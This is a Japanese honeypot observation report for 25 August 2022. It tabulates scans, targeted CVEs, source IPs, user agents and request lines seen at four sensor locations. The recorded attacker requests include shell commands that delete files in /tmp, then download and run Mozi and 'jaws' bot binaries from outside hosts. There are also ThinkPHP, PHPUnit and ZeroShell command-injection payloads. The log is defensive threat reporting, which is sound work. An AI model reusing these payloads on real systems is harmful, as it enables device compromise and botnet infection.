ハニーポット(仮) 観測記録 2022/08/25分です。
特徴
共通
/.envへのスキャン行為
/.gitへのスキャン行為
Location:JP
D-link製品の脆弱性を狙うアクセス
IDBTE4M CODE87によるスキャン行為
.jsへのスキャン行為
/.awsへのスキャン行為
phpMyAdminへのスキャン行為
UserAgentがHello, worldであるアクセス
を確認しました。
/shellに対する以下のアクセスを確認しました。
cd /tmp; rm -rf *; wget 0.0.0.0/jaws; sh /tmp/jaws
cd /tmp; rm -rf *; wget http://192.168.1.1:8088/Mozi.a; chmod 777 Mozi.a; /tmp/Mozi.a jaws
Location:US
Apache HTTP Serverの脆弱性(CVE-2021-41773)を狙うアクセス
D-link製品の脆弱性を狙うアクセス
GPONルータの脆弱性を狙うアクセス
JBossの脆弱性を狙うアクセス
Liferay Portal JSON Web Serviceの脆弱性(CVE-2020-7961)を狙うアクセス
PHPUnitの脆弱性(CVE-2017-9841)を狙うアクセス
Spring Cloud Gatewayの脆弱性(CVE-2022-22947)を狙うアクセス
ThinkPHPの脆弱性を狙うアクセス
ZeroShell Linux distributionの脆弱性(CVE-2009-0545)を狙うアクセス
curlによるスキャン行為
.jsへのスキャン行為
Apache Solrへのスキャン行為
Apache Tomcatへのスキャン行為
Laravelへのスキャン行為
UserAgentがHello, worldであるアクセス
を確認しました。
/shellに対する以下のアクセスを確認しました。
cd /tmp; rm -rf *; wget 0.0.0.0/jaws; sh /tmp/jaws
cd /tmp; rm -rf *; wget synns.cf/jaws; sh /tmp/jaws
Location:UK
Apache HTTP Serverの脆弱性(CVE-2021-41773)を狙うアクセス
GPONルータの脆弱性を狙うアクセス
PHPUnitの脆弱性(CVE-2017-9841)を狙うアクセス
Spring Cloud Gatewayの脆弱性(CVE-2022-22947)を狙うアクセス
ThinkPHPの脆弱性を狙うアクセス
curlによるスキャン行為
.cssへのスキャン行為
.jsへのスキャン行為
Apache Solrへのスキャン行為
phpMyAdminへのスキャン行為
UserAgentがHello, worldであるアクセス
を確認しました。
/shellに対する以下のアクセスを確認しました。
cd /tmp; rm -rf *; wget 0.0.0.0/jaws; sh /tmp/jaws
Location:SG
Apache HTTP Serverの脆弱性(CVE-2021-41773)を狙うアクセス
D-link製品の脆弱性を狙うアクセス
GPONルータの脆弱性を狙うアクセス
Liferay Portal JSON Web Serviceの脆弱性(CVE-2020-7961)を狙うアクセス
PHPUnitの脆弱性(CVE-2017-9841)を狙うアクセス
Spring Cloud Gatewayの脆弱性(CVE-2022-22947)を狙うアクセス
ThinkPHPの脆弱性を狙うアクセス
Lkx-TraversalHttpPluginによるスキャン行為
l9exploreによるスキャン行為
Apache Solrへのスキャン行為
Laravelへのスキャン行為
UserAgentがHello, worldであるアクセス
を確認しました。
/shellに対する以下のアクセスを確認しました。
cd /tmp; rm -rf *; wget 0.0.0.0/jaws; sh /tmp/jaws
cd /tmp; rm -rf *; wget synns.cf/jaws; sh /tmp/jaws
他
アクセス数推移
JP:総アクセス数:168 (前日比:85)
US:総アクセス数:104 (前日比:58)
UK:総アクセス数:92 (前日比:51)
SG:総アクセス数:71 (前日比:19)
都合により GET / HTTP/1.1 POST / HTTP/1.1 は除いています。
Location:JP
送信元IPアドレス一覧
件数 | 送信元IPアドレス | 国 |
---|---|---|
1 | 2.57.122.209 | Romania |
98 | 3.21.154.90 | United States |
2 | 3.81.221.61 | United States |
1 | 20.27.184.147 | United States |
1 | 20.27.185.235 | United States |
1 | 20.200.51.93 | United States |
1 | 20.213.60.141 | United States |
1 | 20.213.249.103 | United States |
1 | 20.214.90.177 | United States |
1 | 37.46.134.25 | Russia |
1 | 38.242.232.9 | United States |
3 | 94.156.175.57 | Bulgaria |
15 | 95.214.235.205 | Ukraine |
1 | 107.150.105.215 | United States |
2 | 109.237.103.9 | Russia |
2 | 109.237.103.118 | Russia |
2 | 109.237.103.123 | Russia |
7 | 118.123.105.87 | China |
1 | 118.193.58.104 | Hong Kong |
8 | 135.125.244.48 | France |
8 | 135.125.246.110 | France |
1 | 151.106.40.96 | Germany |
1 | 178.72.70.126 | Russia |
1 | 180.149.125.166 | Mongolia |
1 | 180.149.125.173 | Mongolia |
2 | 185.100.87.136 | Seychelles |
1 | 192.81.131.253 | United States |
1 | 192.241.219.110 | United States |
1 | 198.235.24.26 | United States |
1 | 198.235.24.140 | United States |
UserAgent一覧
件数 | UserAgent |
---|---|
19 | - |
1 | Go-http-client/1.1 |
5 | Hello, world |
1 | IDBTE4M CODE87 |
1 | Mozila/5.0 |
1 | Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) |
1 | Mozilla/5.0 (Linux; Android 11; RMX1921) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.88 Mobile Safari/537.36 |
1 | Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30 |
1 | Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36 |
2 | Mozilla/5.0 (Windows NT 5.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36 |
35 | Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 |
1 | Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0 |
11 | Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36 |
1 | msnbot/0.11 ( http[:]//search[.]msn[.]com/msnbot.htm) |
87 | python-requests/2.28.1 |
リクエスト内容一覧
件数 | Method | Request | Protocol |
---|---|---|---|
1 | MGLNDD_18.179.20.5_80\n |
||
3 | \x16\x03\x01\x01D\x01 |
||
12 | \x16\x03\x01 |
||
37 | GET | /.env |
HTTP/1.1 |
2 | GET | /.git/config |
HTTP/1.1 |
1 | GET | //.aws/credentials |
HTTP/1.1 |
1 | GET | //.env.bak |
HTTP/1.1 |
1 | GET | //.git/config |
HTTP/1.1 |
1 | GET | //_profiler/phpinfo |
HTTP/1.1 |
1 | GET | // |
HTTP/1.1 |
1 | GET | //admin/dashboard/info.php |
HTTP/1.1 |
1 | GET | //admin/dashboard/phpinfo.php |
HTTP/1.1 |
1 | GET | //admin/dashboard/phpinfo |
HTTP/1.1 |
1 | GET | //admin/info.php |
HTTP/1.1 |
1 | GET | //admin/infophp.php |
HTTP/1.1 |
1 | GET | //admin/phpinfo.php |
HTTP/1.1 |
1 | GET | //admin/phpinfo |
HTTP/1.1 |
1 | GET | //administrator/info.php |
HTTP/1.1 |
1 | GET | //administrator/phpinfo.php |
HTTP/1.1 |
1 | GET | //apache[.]php |
HTTP/1.1 |
1 | GET | //aws[.]yml |
HTTP/1.1 |
1 | GET | //config[.]js |
HTTP/1.1 |
1 | GET | //console/info.php |
HTTP/1.1 |
1 | GET | //console/phpinfo.php |
HTTP/1.1 |
1 | GET | //dashboard/admin/info.php |
HTTP/1.1 |
1 | GET | //dashboard/admin/phpinfo.php |
HTTP/1.1 |
1 | GET | //dashboard/admin/phpinfo |
HTTP/1.1 |
1 | GET | //dashboard/info.php |
HTTP/1.1 |
1 | GET | //dashboard/phpinfo.php |
HTTP/1.1 |
1 | GET | //dashboard/phpinfo |
HTTP/1.1 |
1 | GET | //dashboard/test.php |
HTTP/1.1 |
1 | GET | //debug/default/view?panel=config |
HTTP/1.1 |
1 | GET | //deploy[.]php |
HTTP/1.1 |
1 | GET | //dev[.]php |
HTTP/1.1 |
1 | GET | //env/phpinfo |
HTTP/1.1 |
1 | GET | //foo[.]php |
HTTP/1.1 |
1 | GET | //forum/info.php |
HTTP/1.1 |
1 | GET | //forum/phpinfo.php |
HTTP/1.1 |
1 | GET | //frontend_dev[.]php/$ |
HTTP/1.1 |
1 | GET | //i[.]php |
HTTP/1.1 |
1 | GET | //in[.]php |
HTTP/1.1 |
1 | GET | //index1[.]php |
HTTP/1.1 |
1 | GET | //index[.]php |
HTTP/1.1 |
1 | GET | //inf[.]php |
HTTP/1.1 |
1 | GET | //info1[.]php |
HTTP/1.1 |
1 | GET | //info2[.]php |
HTTP/1.1 |
1 | GET | //info3[.]php |
HTTP/1.1 |
1 | GET | //info4[.]php |
HTTP/1.1 |
2 | GET | //info[.]php |
HTTP/1.1 |
1 | GET | //infophp/index.php |
HTTP/1.1 |
1 | GET | //infophp/testphp.php |
HTTP/1.1 |
1 | GET | //infophp[.]php |
HTTP/1.1 |
1 | GET | //information[.]php |
HTTP/1.1 |
1 | GET | //information |
HTTP/1.1 |
1 | GET | //infos[.]php |
HTTP/1.1 |
1 | GET | //ini[.]php |
HTTP/1.1 |
1 | GET | //o[.]php |
HTTP/1.1 |
1 | GET | //old_phpinfo[.]php |
HTTP/1.1 |
1 | GET | //p[.]php |
HTTP/1.1 |
1 | GET | //php-info.php |
HTTP/1.1 |
1 | GET | //php-info |
HTTP/1.1 |
1 | GET | //php/phpinfo.php |
HTTP/1.1 |
1 | GET | //php1[.]php |
HTTP/1.1 |
1 | GET | //php[.]php |
HTTP/1.1 |
1 | GET | //php_details |
HTTP/1.1 |
1 | GET | //php_info[.]php |
HTTP/1.1 |
1 | GET | //phpdetails |
HTTP/1.1 |
2 | GET | //phpinfo/info.php |
HTTP/1.1 |
1 | GET | //phpinfo/php-details.php |
HTTP/1.1 |
2 | GET | //phpinfo/phpinfo.php |
HTTP/1.1 |
1 | GET | //phpinfo/phpinfo |
HTTP/1.1 |
1 | GET | //phpinfo1[.]php |
HTTP/1.1 |
1 | GET | //phpinfo2[.]php |
HTTP/1.1 |
1 | GET | //phpinfo3[.]php |
HTTP/1.1 |
1 | GET | //phpinfo[.]html |
HTTP/1.1 |
2 | GET | //phpinfo[.]php |
HTTP/1.1 |
1 | GET | //phpinfo[.]txt |
HTTP/1.1 |
1 | GET | //phpinfo |
HTTP/1.1 |
1 | GET | //phpinformation |
HTTP/1.1 |
1 | GET | //phpinfos[.]php |
HTTP/1.1 |
1 | GET | //phptest[.]php |
HTTP/1.1 |
1 | GET | //phpversion[.]php |
HTTP/1.1 |
1 | GET | //pinfo[.]php |
HTTP/1.1 |
1 | GET | //rest[.]php |
HTTP/1.1 |
1 | GET | //root/info.php |
HTTP/1.1 |
1 | GET | //root/infophp |
HTTP/1.1 |
1 | GET | //root/phpinfo.php |
HTTP/1.1 |
1 | GET | //scripts/index.php |
HTTP/1.1 |
1 | GET | //scripts/info.php |
HTTP/1.1 |
1 | GET | //scripts/phpinfo.php |
HTTP/1.1 |
1 | GET | //scripts/phpinfo |
HTTP/1.1 |
1 | GET | //test1[.]php |
HTTP/1.1 |
1 | GET | //test1 |
HTTP/1.1 |
1 | GET | //test2[.]php |
HTTP/1.1 |
1 | GET | //test3[.]php |
HTTP/1.1 |
1 | GET | //test4[.]php |
HTTP/1.1 |
1 | GET | //test[.]php |
HTTP/1.1 |
1 | GET | //testphp[.]php |
HTTP/1.1 |
1 | GET | //token[.]php |
HTTP/1.1 |
1 | GET | /assets/img/logo.png |
HTTP/1.1 |
1 | GET | /c/ |
HTTP/1.1 |
4 | GET | /shell?cd+/tmp;rm+-rf+*;wget+0[.]0[.]0[.]0/jaws;sh+/tmp/jaws |
HTTP/1.1 |
1 | GET | /shell?cd+/tmp;rm+-rf+*;wget+http[:]//192[.]168[.]1[.]1:8088/Mozi.a;chmod+777+Mozi[.]a;/tmp/Mozi.a+jaws |
HTTP/1.1 |
1 | GET | /stalker_portal/server/tools/auth_simple.php |
HTTP/1.1 |
1 | GET | http[:]//18[.]179[.]20[.]5:80/mysql/scripts/setup.php |
HTTP/1.0 |
1 | GET | http[:]//18[.]179[.]20[.]5:80/phpMyAdmin/scripts/setup.php |
HTTP/1.0 |
1 | GET | http[:]//18[.]179[.]20[.]5:80/pma/scripts/setup.php |
HTTP/1.0 |
1 | GET | http[:]//example[.]com/ |
HTTP/1.1 |
1 | POST | /FD873AC4-CF86-4FED-84EC-4BD59C6F17A7 |
HTTP/1.1 |
1 | POST | /HNAP1/ |
HTTP/1.1 |
1 | POST | /index.htm |
HTTP/1.1 |
Location:US
送信元IPアドレス一覧
件数 | 送信元IPアドレス | 国 |
---|---|---|
1 | 2.57.122.209 | Romania |
14 | 4.71.37.46 | United States |
1 | 20.24.248.24 | United States |
1 | 20.84.53.67 | United States |
1 | 20.87.73.92 | United States |
1 | 20.96.230.74 | United States |
1 | 20.104.134.212 | United States |
1 | 20.206.173.36 | United States |
1 | 20.214.79.164 | United States |
1 | 20.214.114.165 | United States |
1 | 20.219.237.38 | United States |
1 | 20.248.129.58 | United States |
1 | 20.250.30.178 | United States |
1 | 20.250.85.84 | United States |
1 | 20.251.64.167 | United States |
1 | 34.221.186.173 | United States |
2 | 45.227.254.8 | Belize |
8 | 51.79.29.48 | Canada |
1 | 52.139.23.173 | United States |
2 | 52.253.119.158 | United States |
1 | 58.242.60.118 | China |
1 | 61.3.186.154 | India |
1 | 64.62.197.40 | United States |
2 | 80.66.88.211 | Russia |
1 | 91.191.209.202 | Bulgaria |
2 | 92.255.85.183 | Hong Kong |
1 | 109.206.241.219 | Bulgaria |
2 | 109.237.103.9 | Russia |
2 | 109.237.103.118 | Russia |
2 | 109.237.103.123 | Russia |
8 | 128.199.128.178 | United Kingdom |
1 | 152.32.149.247 | Hong Kong |
1 | 152.32.150.177 | Hong Kong |
1 | 156.216.222.164 | Egypt |
3 | 159.203.34.249 | United States |
1 | 162.142.125.213 | United States |
1 | 167.94.146.58 | United States |
1 | 167.99.62.205 | United States |
2 | 179.43.154.206 | Panama |
1 | 180.149.125.168 | Mongolia |
1 | 180.149.125.173 | Mongolia |
10 | 185.7.214.117 | Hong Kong |
8 | 185.254.196.223 | Ukraine |
1 | 192.241.235.211 | United States |
3 | 193.37.69.208 | Russia |
1 | 198.235.24.17 | United States |
1 | 208.67.105.203 | United States |
1 | 212.71.238.60 | United States |
1 | 212.112.100.46 | Kyrgyzstan |
UserAgent一覧
件数 | UserAgent |
---|---|
40 | - |
1 | Go-http-client/1.1 |
12 | Hello, world |
1 | Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30 |
1 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 |
1 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/537.13+ (KHTML, like Gecko) Version/5.1.7 Safari/534.57.2 |
1 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36 |
10 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 |
8 | Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0) Gecko/20100101 Firefox/83.0 |
2 | Mozilla/5.0 (Windows NT 5.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36 |
1 | Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1 |
21 | Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 |
1 | Mozilla/5.0 (X11; Linux x86_64; rv:73.0) Gecko/20100101 Firefox/73.0 |
1 | Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0 |
1 | curl/7.68.0 |
1 | python-requests/2.27.1 |
1 | python-requests/2.28.1 |
リクエスト内容一覧
件数 | Method | Request | Protocol |
---|---|---|---|
1 | MGLNDD_34.68.118.83_80\n |
||
10 | \x03 |
||
3 | \x16\x03\x01\x01D\x01 |
||
7 | \x16\x03\x01 |
||
1 | \x82\xd2\x86\x8f\t\xaaW\x84M\x06\x98@\x1e\xcf\xcf\xd4N/\xb6\x90n\v\xf4\x90\xd4\x875;b\v\xf4\x90o\x0f\xb6\x90n\v\xf7\x98n\v\xf4\x90n\v\xf4\x90\xc4\v\xf4\x90n\v\xdf\xbbn\v\xf4\x90F\v\xf4\x90n\v\xf4\x90n\v\xf4\x90n\v\xf4\x90o\n |
||
23 | GET | /.env |
HTTP/1.1 |
2 | GET | /.git/config |
HTTP/1.1 |
1 | GET | /?XDEBUG_SESSION_START=phpstorm |
HTTP/1.1 |
1 | GET | /?a=fetch&content=<php>die(@md5(HelloThinkCMF))</php> |
HTTP/1.1 |
1 | GET | /?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=rdc960ak |
HTTP/1.1 |
1 | GET | /HNAP1/ |
HTTP/1.1 |
1 | GET | /_ignition/execute-solution |
HTTP/1.1 |
1 | GET | /actuator/gateway/routes |
HTTP/1.1 |
1 | GET | /boaform/admin/formLogin?username=admin&psd=admin |
HTTP/1.0 |
1 | GET | /boaform/admin/formLogin?username=adminisp&psd=adminisp |
HTTP/1.0 |
1 | GET | /c/ |
HTTP/1.1 |
14 | GET | /cgi-bin/kerbynet?Section=NoAuthREQ&Action=x509List&type=*%22;cd%20%2Ftmp;curl%20-O%20http%3A%2F%2F5[.]206[.]227[.]228%2Fzero;sh%20zero;%22 |
HTTP/1.0 |
1 | GET | /console/ |
HTTP/1.1 |
2 | GET | /favicon.ico |
HTTP/1.1 |
1 | GET | /index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21 |
HTTP/1.1 |
1 | GET | /invoker/readonly |
HTTP/1.1 |
1 | GET | /jenkins/login |
HTTP/1.1 |
1 | GET | /login |
HTTP/1.1 |
1 | GET | /manager/html |
HTTP/1.1 |
1 | GET | /script |
HTTP/1.1 |
11 | GET | /shell?cd+/tmp;rm+-rf+*;wget+0[.]0[.]0[.]0/jaws;sh+/tmp/jaws |
HTTP/1.1 |
1 | GET | /shell?cd+/tmp;rm+-rf+*;wget+synns[.]cf/jaws;sh+/tmp/jaws |
HTTP/1.1 |
1 | GET | /solr/admin/info/system?wt=json |
HTTP/1.1 |
1 | GET | /stalker_portal/server/tools/auth_simple.php |
HTTP/1.1 |
2 | GET | /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php |
HTTP/1.1 |
1 | GET | /web/config.js |
HTTP/1.0 |
1 | GET | http[:]//example[.]com/ |
HTTP/1.1 |
1 | POST | /_ignition/execute-solution |
HTTP/1.1 |
1 | POST | /boaform/admin/formLogin |
HTTP/1.1 |
1 | POST | /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh |
HTTP/1.1 |
2 | POST | /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php |
HTTP/1.1 |
2 | PRI | * |
HTTP/2.0 |
Location:UK
送信元IPアドレス一覧
件数 | 送信元IPアドレス | 国 |
---|---|---|
1 | 13.95.140.33 | United States |
1 | 20.23.69.94 | United States |
1 | 20.238.251.103 | United States |
2 | 45.227.254.49 | Belize |
2 | 45.227.254.51 | Belize |
1 | 52.90.130.203 | United States |
1 | 74.119.193.190 | Moldova |
1 | 77.83.36.23 | Ukraine |
2 | 80.87.206.250 | Russia |
1 | 91.191.209.202 | Bulgaria |
3 | 94.156.175.57 | Bulgaria |
3 | 106.75.15.80 | China |
1 | 109.206.241.219 | Bulgaria |
2 | 109.237.103.9 | Russia |
2 | 109.237.103.118 | Russia |
2 | 109.237.103.123 | Russia |
1 | 161.97.74.103 | Germany |
1 | 167.71.84.55 | United States |
37 | 178.79.148.229 | United States |
3 | 180.76.119.120 | China |
1 | 180.149.125.166 | Mongolia |
1 | 180.149.125.169 | Mongolia |
10 | 185.7.214.117 | Hong Kong |
8 | 185.254.196.223 | Ukraine |
1 | 192.241.219.227 | United States |
1 | 198.235.24.154 | United States |
1 | 205.210.31.18 | United States |
1 | 209.141.34.187 | United States |
UserAgent一覧
件数 | UserAgent |
---|---|
21 | - |
1 | 1 |
2 | Hello, world |
1 | Java/1.8.0_341 |
2 | Mozilla/5.0 (Linux; Android 10; LIO-AN00 Build/HUAWEILIO-AN00; wv) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.114 Mobile Safari/537.36 |
1 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36 |
1 | Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50 |
10 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 |
2 | Mozilla/5.0 (Windows NT 5.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36 |
11 | Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 |
1 | Mozilla/5.0 (X11; Linux x86_64; rv:73.0) Gecko/20100101 Firefox/73.0 |
1 | Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0 |
3 | Mozilla/5.0 (iPad; U; CPU iPad OS 5_0_1 like Mac OS X; en-us) AppleWebKit/535.1+ (KHTML like Gecko) Version/7.2.0.0 Safari/6533.18.5 |
1 | Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_1 like Mac OS X) AppleWebKit/603.1.30 (KHTML, like Gecko) Version/10.0 Mobile/14E304 Safari/602.1 |
34 | curl/7.54.0 |
リクエスト内容一覧
件数 | Method | Request | Protocol |
---|---|---|---|
1 | MGLNDD_132.145.66.34_80\n |
||
1 | SSH-2.0-libssh2_1.9.0 |
||
5 | \x03 |
||
3 | \x16\x03\x01\x01D\x01 |
||
3 | \x16\x03\x01\x02 |
||
2 | \x16\x03\x01 |
||
1 | CONNECT | www[.]dazn[.]com:443 |
HTTP/1.1 |
12 | GET | /.env |
HTTP/1.1 |
1 | GET | /.git/HEAD |
HTTP/1.1 |
1 | GET | /.git/config |
HTTP/1.1 |
1 | GET | /?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000 |
HTTP/1.1 |
1 | GET | /?=PHPE9568F36-D428-11d2-A769-00AA001ACF42 |
HTTP/1.1 |
1 | GET | /?XDEBUG_SESSION_START=phpstorm |
HTTP/1.1 |
1 | GET | /?a=fetch&content=<php>die(@md5(HelloThinkCMF))</php> |
HTTP/1.1 |
1 | GET | /CSS/Miniweb.css |
HTTP/1.1 |
1 | GET | /HNAP1 |
HTTP/1.1 |
1 | GET | /Portal/Portal.mwsl |
HTTP/1.1 |
1 | GET | /Portal0000.htm |
HTTP/1.1 |
1 | GET | /Public/home/js/check.js |
HTTP/1.1 |
1 | GET | /__Additional |
HTTP/1.1 |
1 | GET | /actuator/gateway/routes |
HTTP/1.1 |
1 | GET | /admin.asp |
HTTP/1.1 |
1 | GET | /admin.cfm |
HTTP/1.1 |
1 | GET | /base.jsa |
HTTP/1.1 |
1 | GET | /c/ |
HTTP/1.1 |
1 | GET | /console/ |
HTTP/1.1 |
1 | GET | /default.jsa |
HTTP/1.1 |
1 | GET | /default.php |
HTTP/1.1 |
1 | GET | /default.pl |
HTTP/1.1 |
1 | GET | /docs/cplugError.html/ |
HTTP/1.1 |
4 | GET | /favicon.ico |
HTTP/1.1 |
1 | GET | /home.jsa |
HTTP/1.1 |
1 | GET | /index.aspx |
HTTP/1.1 |
1 | GET | /index.cfm |
HTTP/1.1 |
1 | GET | /index.jhtml |
HTTP/1.1 |
1 | GET | /index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21 |
HTTP/1.1 |
1 | GET | /indice.html |
HTTP/1.1 |
1 | GET | /localstart.shtml |
HTTP/1.1 |
1 | GET | /main.html |
HTTP/1.1 |
1 | GET | /nmaplowercheck1661322531 |
HTTP/1.1 |
1 | GET | /pools/default/buckets |
HTTP/1.1 |
1 | GET | /pools |
HTTP/1.1 |
1 | GET | /robots.txt |
HTTP/1.1 |
1 | GET | /server-status |
HTTP/1.1 |
2 | GET | /shell?cd+/tmp;rm+-rf+*;wget+0[.]0[.]0[.]0/jaws;sh+/tmp/jaws |
HTTP/1.1 |
1 | GET | /sitemap.xml |
HTTP/1.1 |
1 | GET | /solr/admin/info/system?wt=json |
HTTP/1.1 |
1 | GET | /stalker_portal/server/tools/auth_simple.php |
HTTP/1.1 |
1 | GET | /start.aspx |
HTTP/1.1 |
1 | GET | /start.html |
HTTP/1.1 |
1 | GET | /start.jsa |
HTTP/1.1 |
1 | GET | /static/admin/javascript/hetong.js |
HTTP/1.1 |
1 | GET | /tOg2 |
HTTP/1.1 |
1 | GET | /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php |
HTTP/1.1 |
2 | GET | http[:]//132[.]145[.]66[.]34:80/mysql/scripts/setup.php |
HTTP/1.0 |
2 | GET | http[:]//132[.]145[.]66[.]34:80/phpMyAdmin/scripts/setup.php |
HTTP/1.0 |
2 | GET | http[:]//132[.]145[.]66[.]34:80/pma/scripts/setup.php |
HTTP/1.0 |
1 | HEAD | / |
HTTP/1.1 |
1 | POST | /Autodiscover/Autodiscover.xml |
HTTP/1.1 |
1 | POST | /boaform/admin/formLogin |
HTTP/1.1 |
1 | POST | /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh |
HTTP/1.1 |
1 | POST | /scripts/WPnBr.dll |
HTTP/1.1 |
1 | POST | /sdk |
HTTP/1.1 |
1 | POST | /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php |
HTTP/1.1 |
1 | POST | /wp-comments-post.php |
HTTP/1.1 |
Location:SG
送信元IPアドレス一覧
件数 | 送信元IPアドレス | 国 |
---|---|---|
1 | 2.57.122.80 | Romania |
1 | 2.57.122.209 | Romania |
1 | 3.81.221.61 | United States |
1 | 20.74.117.226 | United States |
1 | 20.84.53.67 | United States |
1 | 27.0.175.252 | Spain |
2 | 38.242.232.9 | United States |
1 | 45.33.108.103 | United States |
11 | 51.79.29.48 | Canada |
1 | 52.142.185.254 | United States |
1 | 59.99.139.54 | India |
1 | 66.240.192.82 | United States |
1 | 74.82.47.6 | United States |
1 | 109.206.241.219 | Bulgaria |
2 | 109.237.103.123 | Russia |
1 | 128.199.60.239 | United Kingdom |
2 | 138.197.183.239 | United States |
10 | 161.35.86.181 | United States |
1 | 161.35.188.242 | United States |
1 | 162.142.125.222 | United States |
1 | 167.94.145.59 | United States |
1 | 167.99.62.205 | United States |
1 | 180.149.125.162 | Mongolia |
1 | 180.149.125.168 | Mongolia |
10 | 185.7.214.117 | Hong Kong |
1 | 185.220.101.191 | Germany |
8 | 185.254.196.223 | Ukraine |
1 | 192.241.206.84 | United States |
2 | 194.165.16.76 | Panama |
1 | 198.235.24.2 | United States |
1 | 212.23.222.167 | Poland |
1 | 217.118.182.110 | Russia |
UserAgent一覧
件数 | UserAgent |
---|---|
13 | - |
4 | Go-http-client/1.1 |
3 | Hello, world |
1 | Lkx-TraversalHttpPlugin/0.0.1 (+https[:]//leakix[.]net/, +https[:]//twitter[.]com/HaboubiAnis) |
2 | Mozila/5.0 |
1 | Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30 |
1 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.109 Safari/537.36 |
1 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36 |
10 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 |
1 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36 |
2 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 |
2 | Mozilla/5.0 (Windows NT 5.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36 |
23 | Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 |
1 | Mozilla/5.0 (X11; Linux x86_64; rv:73.0) Gecko/20100101 Firefox/73.0 |
1 | Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0 |
5 | l9explore/1.3.0 |
リクエスト内容一覧
件数 | Method | Request | Protocol |
---|---|---|---|
1 | 27;wget%20http[:]//%s:%d/Mozi.m%20-O%20->%20/tmp/Mozi.m;chmod%20777%20/tmp/Mozi.m;/tmp/Mozi.m%20dlink.mips%27$ |
HTTP/1.0 | |
1 | MGLNDD_13.67.44.234_80 |
||
2 | \x03 |
||
1 | \x16\x03\x01\x01D\x01 |
||
6 | \x16\x03\x01 |
||
1 | CONNECT | leakix[.]net:443 |
